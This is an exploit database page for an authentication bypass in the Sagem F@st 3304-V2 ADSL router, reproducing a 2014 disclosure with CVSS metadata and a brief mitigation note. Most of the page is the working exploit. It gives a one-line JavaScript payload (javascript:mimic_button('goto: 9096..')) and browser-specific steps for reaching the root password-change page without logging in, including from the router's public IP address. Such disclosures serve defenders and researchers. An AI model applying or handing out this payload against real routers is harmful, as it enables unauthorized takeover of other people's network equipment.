Sagem F@st 3304-V2 Authentication Bypass

vendor:

Sagem F@st 3304-V2

by:

Yassine Aboukir

7.5

CVSS

HIGH

Authentication Bypass

CWE

Product Name: Sagem F@st 3304-V2

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Firefox, Google Chrome, Internet Explorer

2014

Sagem F@st 3304-V2 Authentication Bypass

The Sagem Fast 3304-V2 router is vulnerable to an authentication bypass bug which allows unprivileged users to modify the preconfigured root password then log in with administrator permissions. The vulnerability can be exploited by running javascript code in the web browser bar. The default URL to access the web management interface is http://192.168.1.1 but this attack can also be performed by an external attacker who connects to the router's public IP address.

Mitigation:

The vendor should release a patch to fix the authentication bypass vulnerability. In the meantime, users can mitigate the risk by changing the default root password and regularly updating the router's firmware.

Source

Exploit-DB raw data:

# Title              : Sagem F@st 3304-V2 Authentication Bypass
# Vendor             : http://www.sagemcom.com
# Severity           : High
# Tested on          : Firefox, Google Chrome, Internet Explorer
# Tested Router      : Sagem F@st 3304-V2 (3304, 3464, 3504 may also be affected)
# Date               : 2014-09-04
# Author             : Yassine Aboukir
# Contact            : Yaaboukir@gmail.com
# Blog               : http://linkedin.com/pub/yassine-aboukir/43/900/1b3
-----------

# Vulnerability description: : Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is vulnerable to an authentification bypass bug which allows unprivileged users to modify the preconfigured root password then log in with administrator permissions. 
The default URL to access to the web management interface is http://192.168.1.1 but this attack can also be performed by an axternal attacker who connects to the router's public IP address.

# Exploit :
The vulnerability can be exploited by running javascript code in the web browser bar which allows to access password change page without having permession to do so.
--- Using Chrome, Internet Explorer browser :
You first need to access the router login page http://192.168.1.1/(without loging in) 
Then execute the following javascript in the URL bar : javascript:mimic_button('goto: 9096..')

--- Using Firefox : 
Because running javascript in the url bar has been disabled in Mozilla Firefox, we will try another way :
You first need to access the router login page http://192.168.1.1/(without loging in) 

1st Method : 
You have to bookmark the javascript: link before it can be executed.
---- Show all Bookmarks (Ctrl+Shift+B)
---- Select folder (e.g. Bookmarks Toolbar)
---- Click Organize-> New bookmark .. and enter javascript:mimic_button('goto: 9096..') in the address field.

2nd Method :
The web console tool (CTRL + SHIFT + K), in which you can interpret javascript expressions in real time using the command line provided by the Web Console.